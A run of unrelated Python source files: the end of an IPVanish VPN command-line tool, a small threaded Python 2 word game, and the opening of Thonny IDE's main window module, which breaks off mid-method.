click.echo(f"[IpvanishError] {e}", file=sys.stderr)
except Exception:
click.echo(traceback.print_exc(), file=sys.stderr)
def _get_ipvanish_config_list(countries: list, is_excluded: bool):
config_list = glob.glob(os.path.join(SETTINGS["IPVANISH_PATH"], "configs", "*.ovpn"))
if len(countries) > 0:
L = []
regex = r"ipvanish-(" + r"|".join(countries) + r")-"
for vpn in config_list:
if is_excluded:
if re.search(regex, vpn) is None:
L.append(os.path.join(SETTINGS["IPVANISH_PATH"], "configs", vpn))
else:
if re.search(regex, vpn) is not None:
L.append(os.path.join(SETTINGS["IPVANISH_PATH"], "configs", vpn))
return L
else:
return [os.path.join(SETTINGS["IPVANISH_PATH"], vpn) for vpn in config_list]
def _get_ipvanish_geojson(countries: list, is_excluded: bool):
r = requests.get(SETTINGS["GEOJSON_URL"])
if r.status_code == 200:
d = {}
for geo in r.json():
if countries:
if is_excluded:
if geo["properties"]["countryCode"] in countries:
continue
else:
if not geo["properties"]["countryCode"] in countries:
continue
properties = geo["properties"]
countryCode = properties["countryCode"]
if countryCode == "GB":
countryCode = "UK"
city = properties["city"].replace(" ", "-")
hostNameId = properties["hostname"].split(".")[0]
key = f"ipvanish-{countryCode}-{city}-{hostNameId}"
d[key] = properties
return d
return {}
def _get_vpns(countries: list, is_excluded: bool):
config_files = _get_ipvanish_config_list(countries, is_excluded)
if len(config_files) == 0:
raise IpvanishError("There is no available server")
geojson_data = _get_ipvanish_geojson(countries, is_excluded)
vpns = []
threads = []
with click.progressbar(config_files, label="Retrieving vpn data", show_eta=False) as bar:
for config_file in bar:
geojson_id = config_file.split(".ovpn")[0].split("/")[-1]
vpn = IpvanishVPN(config_file, geojson_data.get(geojson_id, {}))
vpns.append(vpn)
thread = threading.Thread(target=vpn.ping_server)
thread.start()
threads.append(thread)
for i, thread in enumerate(threads):
thread.join()
bar.update(i)
return vpns
def process_country(ctx: click.Context, param: click.Parameter, value):
if not value:
return []
countries = value.split(",")
if "UK" in countries:
countries.append("GB")
elif "GB" in countries:
countries.append("UK")
return countries
@cli.command(context_settings=SETTINGS["CONTEXT"])
@click.option(
"--country",
"countries",
help="VPN's country code to use",
default="",
callback=process_country,
type=str,
)
@click.option("--not", "is_excluded", help="Filter out country code", is_flag=True, default=False)
@click.pass_context
def info(ctx: click.Context, countries: list, is_excluded: bool):
"""Display ipvanish vpn server status"""
try:
if not os.path.exists(os.path.join(SETTINGS["IPVANISH_PATH"], "auth")):
raise IpvanishError("Auth credentials not configured. Please run commands auth")
vpns = _get_vpns(countries, is_excluded)
vpns.sort()
table = beautifultable.BeautifulTable(max_width=180)
table.set_style(beautifultable.STYLE_BOX_ROUNDED)
table.column_headers = [
"Server",
"City",
"Country",
"Region",
"Ping",
"Capacity",
]
for vpn in vpns:
table.append_row(
[vpn.server, vpn.city, vpn.country, vpn.region, vpn.ping, vpn.capacity]
)
click.echo(table)
except IpvanishError as e:
click.echo(f"[IpvanishError] {e}", file=sys.stderr)
except Exception:
click.echo(traceback.print_exc(), file=sys.stderr)
@cli.command(context_settings=SETTINGS["CONTEXT"])
@click.option(
"--country",
"countries",
help="VPN's country code to use",
default="",
callback=process_country,
type=str,
)
@click.option("--not", "is_excluded", help="Filter out country code", is_flag=True, default=False)
@click.pass_context
def connect(ctx: click.Context, countries: list, is_excluded: bool):
"""Connect to an ipvanish vpn server"""
try:
if not os.path.exists(os.path.join(SETTINGS["IPVANISH_PATH"], "auth")):
raise IpvanishError("Auth credentials not configured. Please run commands auth")
vpns = _get_vpns(countries, is_excluded)
vpns.sort()
click.echo(f"Connecting to {vpns[0]} ...")
vpns[0].connect()
except IpvanishError as e:
click.echo(f"[IpvanishError] {e}", file=sys.stderr)
except Exception:
click.echo(traceback.print_exc(), file=sys.stderr)
|
MainFile.py
|
from threading import Thread
from Display import Display
from time import sleep
from Sound import Sound
#from vr import AudioListener
from vr_no_over_lap import AudioListener
class Status(object):
def __init__(self):
#0- not started
#1- started
#2- Exploded
#3- Closing
self.status=0
#True : change the word
#False: keep the word
self.changeword=False
#Count how many words been shown
self.wordscounter=0
self.currentword=''
def reset(self):
self.status=0
self.changeword=False
self.wordscounter=0
self.currentword=''
def wordupdated(self):
self.changeword=False
self.wordscounter+=1
def getstatus(self):
return self.status
#initalize main classes and game status
status = Status()
print status.getstatus()
disp = Display(status)
sound = Sound(status)
alistner = AudioListener(status)
def Displayfunction():
while status.status!=3:
disp.display()
sleep(0.5)
disp.clear()
print 'Display Thread Ended \n'
displaythread = Thread(target=Displayfunction)
soundthread= Thread(target=sound.SoundOperator)
listnerthread= Thread(target=alistner.AudioListenerOperator)
interpterthread= Thread(target=alistner.AudioInterpreter)
def initialize():
displaythread.start()
soundthread.start()
listnerthread.start()
interpterthread.start()
sleep(2)#Replace with Shaking
status.status=1
status.changeword=True
print '2'
sleep(50)
status.status=2
sleep(2)
status.status=3
disp.clear()
def FinalInitialization():
displaythread.start()
soundthread.start()
listnerthread.start()
interpterthread.start()
#Put with Shaking
status.status=1
status.changeword=True
while 1:
#Game Exploded
if status.status==2:
#Put Shaking Here
status.reset()
status.status=1
status.changeword=True
#Every Second Will Check The game status
sleep(1)
try:
initialize()
except:
status.status=3
|
workbench.py
|
# -*- coding: utf-8 -*-
import ast
import collections
import importlib
import logging
import os.path
import pkgutil
import platform
import queue
import re
import socket
import sys
import tkinter as tk
import tkinter.font as tk_font
import traceback
from threading import Thread
from tkinter import messagebox, ttk
from typing import Any, Callable, Dict, List, Optional, Sequence, Set, Tuple, Type, Union, cast
from warnings import warn
import thonny
from thonny import (
THONNY_USER_DIR,
assistance,
get_runner,
get_shell,
is_portable,
languages,
running,
ui_utils,
)
from thonny.common import Record, UserError, normpath_with_actual_case
from thonny.config import try_load_configuration
from thonny.config_ui import ConfigurationDialog
from thonny.editors import EditorNotebook
from thonny.languages import tr
from thonny.misc_utils import (
copy_to_clipboard,
running_on_linux,
running_on_mac_os,
running_on_rpi,
running_on_windows,
)
from thonny.running import BackendProxy, Runner
from thonny.shell import ShellView
from thonny.ui_utils import (
AutomaticNotebook,
AutomaticPanedWindow,
create_tooltip,
get_style_configuration,
lookup_style_option,
register_latin_shortcut,
select_sequence,
sequence_to_accelerator,
)
logger = logging.getLogger(__name__)
SERVER_SUCCESS = "OK"
SIMPLE_MODE_VIEWS = ["ShellView"]
MenuItem = collections.namedtuple("MenuItem", ["group", "position_in_group", "tester"])
BackendSpec = collections.namedtuple(
"BackendSpec", ["name", "proxy_class", "description", "config_page_constructor", "sort_key"]
)
BasicUiThemeSettings = Dict[str, Dict[str, Union[Dict, Sequence]]]
CompoundUiThemeSettings = List[BasicUiThemeSettings]
UiThemeSettings = Union[BasicUiThemeSettings, CompoundUiThemeSettings]
FlexibleUiThemeSettings = Union[UiThemeSettings, Callable[[], UiThemeSettings]]
SyntaxThemeSettings = Dict[str, Dict[str, Union[str, int, bool]]]
FlexibleSyntaxThemeSettings = Union[SyntaxThemeSettings, Callable[[], SyntaxThemeSettings]]
OBSOLETE_PLUGINS = [
"thonnycontrib.pi",
"thonnycontrib.micropython",
"thonnycontrib.circuitpython",
"thonnycontrib.microbit",
"thonnycontrib.esp",
]
class Workbench(tk.Tk):
"""
Thonny's main window and communication hub.
Is responsible for:
* creating the main window
* maintaining layout (_init_containers)
* loading plugins (_init_plugins, add_view, add_command)
* providing references to main components (editor_notebook and runner)
* communication between other components (see event_generate and bind)
* configuration services (get_option, set_option, add_defaults)
* loading translations
* maintaining fonts (named fonts, increasing and decreasing font size)
After workbench and plugins get loaded, 3 kinds of events start happening:
* User events (keypresses, mouse clicks, menu selections, ...)
* Virtual events (mostly via get_workbench().event_generate). These include:
events reported via and dispatched by Tk event system;
WorkbenchEvent-s, reported via and dispatched by enhanced get_workbench().event_generate.
* Events from the background process (program output notifications, input requests,
notifications about debugger's progress)
"""
def __init__(self) -> None:
thonny._workbench = self
self.ready = False
self._closing = False
self._destroyed = False
self._lost_focus = False
self._is_portable = is_portable()
self.initializing = True
self._init_configuration()
self._check_init_server_loop()
tk.Tk.__init__(self, className="Thonny")
tk.Tk.report_callback_exception = self._on_tk_exception # type: ignore
ui_utils.add_messagebox_parent_checker()
self._event_handlers = {} # type: Dict[str, Set[Callable]]
self._images = (
set()
) # type: Set[tk.PhotoImage] # keep images here to avoid Python garbage collecting them,
self._default_image_mapping = (
{}
) # type: Dict[str, str] # to allow specify default alternative images
self._image_mapping_by_theme = (
{}
) # type: Dict[str, Dict[str, str]] # theme-based alternative images
self._current_theme_name = "clam" # will be overwritten later
self._backends = {} # type: Dict[str, BackendSpec]
self._exercise_providers = []
self._commands = [] # type: List[Dict[str, Any]]
self._toolbar_buttons = {}
self._view_records = {} # type: Dict[str, Dict[str, Any]]
self.content_inspector_classes = [] # type: List[Type]
self._latin_shortcuts = {} # type: Dict[Tuple[int,int], List[Tuple[Callable, Callable]]]
self._init_language()
self._active_ui_mode = os.environ.get("THONNY_MODE", self.get_option("general.ui_mode"))
self._init_scaling()
self._init_theming()
self._init_window()
self.option_add("*Dialog.msg.wrapLength", "8i")
self.add_view(
ShellView, tr("Shell"), "s", visible_by_default=True, default_position_key="A"
)
from thonny.exercises import ExercisesView
self.add_view(ExercisesView, tr("Exercises"), "ne")
assistance.init()
self._runner = Runner()
self._load_plugins()
self._editor_notebook = None # type: Optional[EditorNotebook]
self._init_fonts()
self.reload_themes()
self._init_menu()
self._init_containers()
assert self._editor_notebook is not None
self._init_program_arguments_frame()
# self._init_backend_switcher()
self._init_regular_mode_link() # TODO:
self._show_views()
# Make sure ShellView is loaded
get_shell()
self._init_commands()
self._init_icon()
try:
self._editor_notebook.load_startup_files()
except Exception:
self.report_exception()
self._editor_notebook.focus_set()
self._try_action(self._open_views)
self.bind_class("CodeViewText", "<<CursorMove>>", self.update_title, True)
self.bind_class("CodeViewText", "<<Modified>>", self.update_title, True)
self.bind_class("CodeViewText", "<<TextChange>>", self.update_title, True)
self.get_editor_notebook().bind("<<NotebookTabChanged>>", self.update_title, True)
self.bind_all("<KeyPress>", self._on_all_key_presses, True)
self.bind("<FocusOut>", self._on_focus_out, True)
self.bind("<FocusIn>", self._on_focus_in, True)
self._publish_commands()
self.initializing = False
self.event_generate("<<WorkbenchInitialized>>")
self._make_sanity_checks()
if self._is_server():
self._poll_ipc_requests()
"""
for name in sorted(sys.modules):
if (
not name.startswith("_")
and not name.startswith("thonny")
and not name.startswith("tkinter")
):
print(name)
"""
self.after(1, self._start_runner) # Show UI already before waiting for the backend to start
self.after_idle(self.advertise_ready)
def advertise_ready(self):
self.event_generate("WorkbenchReady")
self.ready = True
def _make_sanity_checks(self):
home_dir = os.path.expanduser("~")
bad_home_msg = None
if home_dir == "~":
bad_home_msg = "Can not find your home directory."
elif not os.path.exists(home_dir):
bad_home_msg = "Reported home directory (%s) does not exist." % home_dir
if bad_home_msg:
messagebox.showwarning(
"Problems with home directory",
bad_home_msg + "\nThis may cause problems for Thonny.",
master=self,
)
def _try_action(self, action: Callable) -> None:
try:
action()
except Exception:
self.report_exception()
def _init_configuration(self) -> None:
self._configuration_manager = try_load_configuration(thonny.CONFIGURATION_FILE)
self._configuration_pages = [] # type: List[Tuple[str, str, Type[tk.Widget]]]
self.set_default("general.single_instance", thonny.SINGLE_INSTANCE_DEFAULT)
self.set_default("general.ui_mode", "simple" if running_on_rpi() else "regular")
self.set_default("general.debug_mode", False)
self.set_default("general.disable_notification_sound", False)
self.set_default("general.scaling", "default")
self.set_default("general.language", languages.BASE_LANGUAGE_CODE)
self.set_default("general.font_scaling_mode", "default")
self.set_default("run.working_directory", os.path.expanduser("~"))
self.update_debug_mode()
def update_debug_mode(self):
os.environ["THONNY_DEBUG"] = str(self.get_option("general.debug_mode", False))
thonny.set_logging_level()
def _init_language(self) -> None:
"""Initialize language."""
languages.set_language(self.get_option("general.language"))
def _init_window(self) -> None:
self.title("Thonny")
self.set_default("layout.zoomed", False)
self.set_default("layout.top", 15)
self.set_default("layout.left", 150)
if self.in_simple_mode():
self.set_default("layout.width", 1050)
self.set_default("layout.height", 700)
else:
self.set_default("layout.width", 800)
self.set_default("layout.height", 650)
self.set_default("layout.w_width", 200)
self.set_default("layout.e_width", 200)
self.set_default("layout.s_height", 200)
# I don't actually need saved options for Full screen/maximize view,
# but it's easier to create menu items, if I use configuration manager's variables
self.set_default("view.full_screen", False)
self.set_default("view.maximize_view", False)
# In order to avoid confusion set these settings to False
# even if they were True when Thonny was last run
self.set_option("view.full_screen", False)
self.set_option("view.maximize_view", False)
self.geometry(
"{0}x{1}+{2}+{3}".format(
min(max(self.get_option("layout.width"), 320), self.winfo_screenwidth()),
min(max(self.get_option("layout.height"), 240), self.winfo_screenheight()),
min(max(self.get_option("layout.left"), 0), self.winfo_screenwidth() - 200),
min(max(self.get_option("layout.top"), 0), self.winfo_screenheight() - 200),
)
)
if self.get_option("layout.zoomed"):
ui_utils.set_zoomed(self, True)
self.protocol("WM_DELETE_WINDOW", self._on_close)
self.bind("<Configure>", self._on_configure, True)
def _init_icon(self) -> None:
# Window icons
if running_on_linux() and ui_utils.get_tk_version_info() >= (8, 6):
self.iconphoto(True, self.get_image("thonny.png"))
else:
icon_file = os.path.join(self.get_package_dir(), "res", "thonny.ico")
try:
self.iconbitmap(icon_file, default=icon_file)
except Exception:
try:
# seems to work in mac
self.iconbitmap(icon_file)
except Exception:
pass
def _init_menu(self) -> None:
self.option_add("*tearOff", tk.FALSE)
if lookup_style_option("Menubar", "custom", False):
self._menubar = ui_utils.CustomMenubar(
self
) # type: Union[tk.Menu, ui_utils.CustomMenubar]
if self.get_ui_mode() != "simple":
self._menubar.grid(row=0, sticky="nsew")
else:
opts = get_style_configuration("Menubar")
if "custom" in opts:
del opts["custom"]
self._menubar = tk.Menu(self, **opts)
if self.get_ui_mode() != "simple":
self["menu"] = self._menubar
self._menus = {} # type: Dict[str, tk.Menu]
self._menu_item_specs = (
{}
) # type: Dict[Tuple[str, str], MenuItem] # key is pair (menu_name, command_label)
# create standard menus in correct order
self.get_menu("file", tr("File"))
self.get_menu("edit", tr("Edit"))
self.get_menu("view", tr("View"))
self.get_menu("run", tr("Run"))
self.get_menu("tools", tr("Tools"))
self.get_menu("help", tr("Help"))
def _load_plugins(self) -> None:
# built-in plugins
import thonny.plugins # pylint: disable=redefined-outer-name
self._load_plugins_from_path(thonny.plugins.__path__, "thonny.plugins.") # type: ignore
# 3rd party plugins from namespace package
try:
import thonnycontrib # @UnresolvedImport
except ImportError:
# No 3rd party plugins installed
pass
else:
self._load_plugins_from_path(thonnycontrib.__path__, "thonnycontrib.")
def _load_plugins_from_path(self, path: List[str], prefix: str) -> None:
load_function_name = "load_plugin"
modules = []
for _, module_name, _ in sorted(pkgutil.iter_modules(path, prefix), key=lambda x: x[2]):
if module_name in OBSOLETE_PLUGINS:
logging.debug("Skipping plug-in %s", module_name)
else:
try:
m = importlib.import_module(module_name)
if hasattr(m, load_function_name):
modules.append(m)
except Exception:
logging.exception("Failed loading plugin '" + module_name + "'")
def module_sort_key(m):
return getattr(m, "load_order_key", m.__name__)
for m in sorted(modules, key=module_sort_key):
getattr(m, load_function_name)()
def _init_fonts(self) -> None:
# set up editor and shell fonts
self.set_default("view.io_font_family", "Courier" if running_on_mac_os() else "Courier New")
default_editor_family = "Courier New"
families = tk_font.families()
for family in ["Consolas", "Ubuntu Mono", "Menlo", "DejaVu Sans Mono"]:
if family in families:
default_editor_family = family
break
self.set_default("view.editor_font_family", default_editor_family)
if running_on_mac_os():
self.set_default("view.editor_font_size", 14)
self.set_default("view.io_font_size", 12)
elif self.in_simple_mode():
self.set_default("view.editor_font_size", 12)
self.set_default("view.io_font_size", 12)
else:
self.set_default("view.editor_font_size", 13)
self.set_default("view.io_font_size", 11)
default_font = tk_font.nametofont("TkDefaultFont")
if running_on_linux():
heading_font = tk_font.nametofont("TkHeadingFont")
heading_font.configure(weight="normal")
caption_font = tk_font.nametofont("TkCaptionFont")
caption_font.configure(weight="normal", size=default_font.cget("size"))
small_link_ratio = 0.8 if running_on_windows() else 0.7
self._fonts = [
tk_font.Font(
name="SmallLinkFont",
family=default_font.cget("family"),
size=int(default_font.cget("size") * small_link_ratio),
underline=True,
),
tk_font.Font(name="IOFont", family=self.get_option("view.io_font_family")),
tk_font.Font(
name="BoldIOFont", family=self.get_option("view.io_font_family"), weight="bold"
),
tk_font.Font(
name="UnderlineIOFont",
family=self.get_option("view.io_font_family"),
underline=True,
),
tk_font.Font(
name="ItalicIOFont", family=self.get_option("view.io_font_family"), slant="italic"
),
tk_font.Font(
name="BoldItalicIOFont",
family=self.get_option("view.io_font_family"),
weight="bold",
slant="italic",
),
tk_font.Font(name="EditorFont", family=self.get_option("view.editor_font_family")),
tk_font.Font(name="SmallEditorFont", family=self.get_option("view.editor_font_family")),
tk_font.Font(
name="BoldEditorFont",
family=self.get_option("view.editor_font_family"),
weight="bold",
),
tk_font.Font(
name="ItalicEditorFont",
family=self.get_option("view.editor_font_family"),
slant="italic",
),
tk_font.Font(
name="BoldItalicEditorFont",
family=self.get_option("view.editor_font_family"),
weight="bold",
slant="italic",
),
tk_font.Font(
name="TreeviewFont",
family=default_font.cget("family"),
size=default_font.cget("size"),
),
tk_font.Font(
name="BoldTkDefaultFont",
family=default_font.cget("family"),
size=default_font.cget("size"),
weight="bold",
),
tk_font.Font(
name="ItalicTkDefaultFont",
family=default_font.cget("family"),
size=default_font.cget("size"),
slant="italic",
),
tk_font.Font(
name="UnderlineTkDefaultFont",
family=default_font.cget("family"),
size=default_font.cget("size"),
underline=1,
),
]
self.update_fonts()
def _start_runner(self) -> None:
try:
self.update_idletasks() # allow UI to complete
thonny._runner = self._runner
self._runner.start()
self._update_toolbar()
except Exception:
self.report_exception("Error when initializing backend")
def _check_init_server_loop(self) -> None:
"""Socket will listen requests from newer Thonny instances,
which try to delegate opening files to older instance"""
if not self.get_option("general.single_instance") or os.path.exists(
thonny.get_ipc_file_path()
):
self._ipc_requests = None
return
self._ipc_requests = queue.Queue() # type: queue.Queue[bytes]
server_socket, actual_secret = self._create_server_socket()
server_socket.listen(10)
def server_loop():
while True:
logging.debug("Waiting for next client")
(client_socket, _) = server_socket.accept()
try:
data = bytes()
while True:
new_data = client_socket.recv(1024)
if len(new_data) > 0:
data += new_data
else:
break
proposed_secret, args = ast.literal_eval(data.decode("UTF-8"))
if proposed_secret == actual_secret:
self._ipc_requests.put(args)
# respond OK
client_socket.sendall(SERVER_SUCCESS.encode(encoding="utf-8"))
client_socket.shutdown(socket.SHUT_WR)
logging.debug("AFTER NEW REQUEST %s", client_socket)
else:
client_socket.shutdown(socket.SHUT_WR)
raise PermissionError("Wrong secret")
except Exception:
traceback.print_exc()
Thread(target=server_loop, daemon=True).start()
def _create_server_socket(self):
if running_on_windows():
server_socket = socket.socket(socket.AF_INET) # @UndefinedVariable
server_socket.bind(("127.0.0.1", 0))
# advertise the port and secret
port = server_socket.getsockname()[1]
import uuid
secret = str(uuid.uuid4())
with open(thonny.get_ipc_file_path(), "w") as fp:
fp.write(str(port) + "\n")
fp.write(secret + "\n")
else:
server_socket = socket.socket(socket.AF_UNIX) # @UndefinedVariable
server_socket.bind(thonny.get_ipc_file_path())
secret = ""
os.chmod(thonny.get_ipc_file_path(), 0o600)
return server_socket, secret
def _init_commands(self) -> None:
self.add_command(
"exit",
"file",
tr("Exit"),
self._on_close,
default_sequence=select_sequence("<Alt-F4>", "<Command-q>", "<Control-q>"),
extra_sequences=["<Alt-F4>"]
if running_on_linux()
else ["<Control-q>"]
if running_on_windows()
else [],
)
self.add_command("show_options", "tools", tr("Options..."), self.show_options, group=180)
self.createcommand("::tk::mac::ShowPreferences", self.show_options)
self.createcommand("::tk::mac::Quit", self._mac_quit)
self.add_command(
"increase_font_size",
"view",
tr("Increase font size"),
lambda: self._change_font_size(1),
default_sequence=select_sequence("<Control-plus>", "<Command-Shift-plus>"),
extra_sequences=["<Control-KP_Add>"],
group=60,
)
self.add_command(
"decrease_font_size",
"view",
tr("Decrease font size"),
lambda: self._change_font_size(-1),
default_sequence=select_sequence("<Control-minus>", "<Command-minus>"),
extra_sequences=["<Control-KP_Subtract>"],
group=60,
)
self.bind("<Control-MouseWheel>", self._cmd_zoom_with_mouse, True)
self.add_command(
"focus_editor",
"view",
tr("Focus editor"),
self._cmd_focus_editor,
default_sequence=select_sequence("<Alt-e>", "<Command-Alt-e>"),
group=70,
)
self.add_command(
"focus_shell",
"view",
tr("Focus shell"),
self._cmd_focus_shell,
default_sequence=select_sequence("<Alt-s>", "<Command-Alt-s>"),
group=70,
)
if self.get_ui_mode() == "expert":
self.add_command(
"toggle_maximize_view",
"view",
tr("Maximize view"),
self._cmd_toggle_maximize_view,
flag_name="view.maximize_view",
default_sequence=None,
group=80,
)
self.bind_class("TNotebook", "<Double-Button-1>", self._maximize_view, True)
self.bind("<Escape>", self._unmaximize_view, True)
self.add_command(
"toggle_maximize_view",
"view",
tr("Full screen"),
self._cmd_toggle_full_screen,
flag_name="view.full_screen",
default_sequence=select_sequence("<F11>", "<Command-Shift-F>"),
group=80,
)
if self.in_simple_mode():
self.add_command(
"font",
"tools",
tr("Change font size"),
caption=tr("Zoom"),
handler=self._toggle_font_size,
image="zoom",
include_in_toolbar=True,
)
self.add_command(
"quit",
"help",
tr("Exit Thonny"),
self._on_close,
image="quit",
caption=tr("Quit"),
include_in_toolbar=True,
group=101,
)
if thonny.in_debug_mode():
self.bind_all("<Control-Shift-Alt-D>", self._print_state_for_debugging, True)
def _print_state_for_debugging(self, event) -> None:
print(get_runner()._postponed_commands)
def _init_containers(self) -> None:
# Main frame functions as
# - a backgroud behind padding of main_pw, without this OS X leaves white border
# - a container to be hidden, when a view is maximized and restored when view is back home
main_frame = ttk.Frame(self) #
self._main_frame = main_frame
main_frame.grid(row=1, column=0, sticky=tk.NSEW)
self.columnconfigure(0, weight=1)
self.rowconfigure(1, weight=1)
self._maximized_view = None # type: Optional[tk.Widget]
self._toolbar = ttk.Frame(main_frame, padding=0)
self._toolbar.grid(column=0, row=0, sticky=tk.NSEW, padx=10, pady=(5, 0))
self.set_default("layout.west_pw_width", self.scale(150))
self.set_default("layout.east_pw_width", self.scale(150))
self.set_default("layout.s_nb_height", self.scale(150))
self.set_default("layout.nw_nb_height", self.scale(150))
self.set_default("layout.sw_nb_height", self.scale(150))
self.set_default("layout.ne_nb_height", self.scale(150))
self.set_default("layout.se_nb_height", self.scale(150))
self._main_pw = AutomaticPanedWindow(main_frame, orient=tk.HORIZONTAL)
self._main_pw.grid(column=0, row=1, sticky=tk.NSEW, padx=10, pady=10)
main_frame.columnconfigure(0, weight=1)
main_frame.rowconfigure(1, weight=1)
self._west_pw = AutomaticPanedWindow(
self._main_pw,
1,
orient=tk.VERTICAL,
preferred_size_in_pw=self.get_option("layout.west_pw_width"),
)
self._center_pw = AutomaticPanedWindow(self._main_pw, 2, orient=tk.VERTICAL)
self._east_pw = AutomaticPanedWindow(
self._main_pw,
3,
orient=tk.VERTICAL,
preferred_size_in_pw=self.get_option("layout.east_pw_width"),
)
self._view_notebooks = {
"nw": AutomaticNotebook(
self._west_pw, 1, preferred_size_in_pw=self.get_option("layout.nw_nb_height")
),
"w": AutomaticNotebook(self._west_pw, 2),
"sw": AutomaticNotebook(
self._west_pw, 3, preferred_size_in_pw=self.get_option("layout.sw_nb_height")
),
"s": AutomaticNotebook(
self._center_pw, 3, preferred_size_in_pw=self.get_option("layout.s_nb_height")
),
"ne": AutomaticNotebook(
self._east_pw, 1, preferred_size_in_pw=self.get_option("layout.ne_nb_height")
),
"e": AutomaticNotebook(self._east_pw, 2),
"se": AutomaticNotebook(
self._east_pw, 3, preferred_size_in_pw=self.get_option("layout.se_nb_height")
),
}
for nb_name in self._view_notebooks:
self.set_default("layout.notebook_" + nb_name + "_visible_view", None)
self._editor_notebook = EditorNotebook(self._center_pw)
self._editor_notebook.position_key = 1 # type: ignore
self._center_pw.insert("auto", self._editor_notebook)
def _init_theming(self) -> None:
self._style = ttk.Style()
self._ui_themes = (
{}
) # type: Dict[str, Tuple[Optional[str], FlexibleUiThemeSettings, Dict[str, str]]] # value is (parent, settings, images)
self._syntax_themes = (
{}
) # type: Dict[str, Tuple[Optional[str], FlexibleSyntaxThemeSettings]] # value is (parent, settings)
self.set_default("view.ui_theme", ui_utils.get_default_theme())
def add_command(
self,
command_id: str,
menu_name: str,
command_label: str,
handler: Optional[Callable[[], None]] = None,
tester: Optional[Callable[[], bool]] = None,
default_sequence: Optional[str] = None,
extra_sequences: Sequence[str] = [],
flag_name: Optional[str] = None,
skip_sequence_binding: bool = False,
accelerator: Optional[str] = None,
group: int = 99,
position_in_group="end",
image: Optional[str] = None,
caption: Optional[str] = None,
alternative_caption: Optional[str] = None,
include_in_menu: bool = True,
include_in_toolbar: bool = False,
submenu: Optional[tk.Menu] = None,
bell_when_denied: bool = True,
show_extra_sequences=False,
) -> None:
"""Registers an item to be shown in specified menu.
Args:
menu_name: Name of the menu the command should appear in.
Standard menu names are "file", "edit", "run", "view", "help".
If a menu with given name doesn't exist, then new menu is created
(with label=name).
command_label: Label for this command
handler: Function to be called when the command is invoked.
Should be callable with one argument (the event or None).
tester: Function to be called for determining if command is available or not.
Should be callable with one argument (the event or None).
Should return True or False.
If None then command is assumed to be always available.
default_sequence: Default shortcut (Tk style)
flag_name: Used for toggle commands. Indicates the name of the boolean option.
group: Used for grouping related commands together. Value should be int.
Groups with smaller numbers appear before.
Returns:
None
"""
# Temporary solution for plug-ins made for versions before 3.2
if menu_name == "device":
menu_name = "tools"
group = 150
# store command to be published later
self._commands.append(
dict(
command_id=command_id,
menu_name=menu_name,
command_label=command_label,
handler=handler,
tester=tester,
default_sequence=default_sequence,
extra_sequences=extra_sequences,
flag_name=flag_name,
skip_sequence_binding=skip_sequence_binding,
accelerator=accelerator,
group=group,
position_in_group=position_in_group,
image=image,
caption=caption,
alternative_caption=alternative_caption,
include_in_menu=include_in_menu,
include_in_toolbar=include_in_toolbar,
submenu=submenu,
bell_when_denied=bell_when_denied,
show_extra_sequences=show_extra_sequences,
)
)
def _publish_commands(self) -> None:
for cmd in self._commands:
self._publish_command(**cmd)
def _publish_command(
self,
command_id: str,
menu_name: str,
command_label: str,
handler: Optional[Callable[[], None]],
tester: Optional[Callable[[], bool]] = None,
default_sequence: Optional[str] = None,
extra_sequences: Sequence[str] = [],
flag_name: Optional[str] = None,
skip_sequence_binding: bool = False,
accelerator: Optional[str] = None,
group: int = 99,
position_in_group="end",
image: Optional[str] = None,
caption: Optional[str] = None,
alternative_caption: Optional[str] = None,
include_in_menu: bool = True,
include_in_toolbar: bool = False,
submenu: Optional[tk.Menu] = None,
bell_when_denied: bool = True,
show_extra_sequences: bool = False,
) -> None:
def dispatch(event=None):
if not tester or tester():
denied = False
handler()
else:
denied = True
logging.debug("Command '" + command_id + "' execution denied")
if bell_when_denied:
self.bell()
self.event_generate("UICommandDispatched", command_id=command_id, denied=denied)
sequence_option_name = "shortcuts." + command_id
self.set_default(sequence_option_name, default_sequence)
sequence = self.get_option(sequence_option_name)
if sequence:
if not skip_sequence_binding:
self.bind_all(sequence, dispatch, True)
# register shortcut even without binding
register_latin_shortcut(self._latin_shortcuts, sequence, handler, tester)
for extra_sequence in extra_sequences:
self.bind_all(extra_sequence, dispatch, True)
if "greek_" not in extra_sequence.lower() or running_on_linux():
# Use greek alternatives only on Linux
# (they are not required on Mac
# and cause double events on Windows)
register_latin_shortcut(self._latin_shortcuts, sequence, handler, tester)
menu = self.get_menu(menu_name)
if image:
_image = self.get_image(image) # type: Optional[tk.PhotoImage]
_disabled_image = self.get_image(image, disabled=True)
else:
_image = None
_disabled_image = None
if not accelerator and sequence:
accelerator = sequence_to_accelerator(sequence)
"""
# Does not work on Mac
if show_extra_sequences:
for extra_seq in extra_sequences:
accelerator += " or " + sequence_to_accelerator(extra_seq)
"""
if include_in_menu:
def dispatch_from_menu():
# I don't like that Tk menu toggles checbutton variable
# automatically before calling the handler.
# So I revert the toggle before calling the actual handler.
# This way the handler doesn't have to worry whether it
# needs to toggle the variable or not, and it can choose to
# decline the toggle.
if flag_name is not None:
var = self.get_variable(flag_name)
var.set(not var.get())
dispatch(None)
if _image and lookup_style_option("OPTIONS", "icons_in_menus", True):
menu_image = _image # type: Optional[tk.PhotoImage]
elif flag_name:
# no image or black next to a checkbox
menu_image = None
else:
menu_image = self.get_image("16x16-blank")
# remember the details that can't be stored in Tkinter objects
self._menu_item_specs[(menu_name, command_label)] = MenuItem(
group, position_in_group, tester
)
menu.insert(
self._find_location_for_menu_item(menu_name, command_label),
"checkbutton" if flag_name else "cascade" if submenu else "command",
label=command_label,
accelerator=accelerator,
image=menu_image,
compound=tk.LEFT,
variable=self.get_variable(flag_name) if flag_name else None,
command=dispatch_from_menu if handler else None,
menu=submenu,
)
if include_in_toolbar:
toolbar_group = self._get_menu_index(menu) * 100 + group
assert caption is not None
self._add_toolbar_button(
command_id,
_image,
_disabled_image,
command_label,
caption,
caption if alternative_caption is None else alternative_caption,
accelerator,
handler,
tester,
toolbar_group,
)
def add_view(
self,
cls: Type[tk.Widget],
label: str,
default_location: str,
visible_by_default: bool = False,
default_position_key: Optional[str] = None,
) -> None:
"""Adds item to "View" menu for showing/hiding given view.
Args:
view_class: Class or constructor for view. Should be callable with single
argument (the master of the view)
label: Label of the view tab
location: Location descriptor. Can be "nw", "sw", "s", "se", "ne"
Returns: None
"""
view_id = cls.__name__
if default_position_key == None:
default_position_key = label
self.set_default("view." + view_id + ".visible", visible_by_default)
self.set_default("view." + view_id + ".location", default_location)
self.set_default("view." + view_id + ".position_key", default_position_key)
if self.in_simple_mode():
visibility_flag = tk.BooleanVar(value=view_id in SIMPLE_MODE_VIEWS)
else:
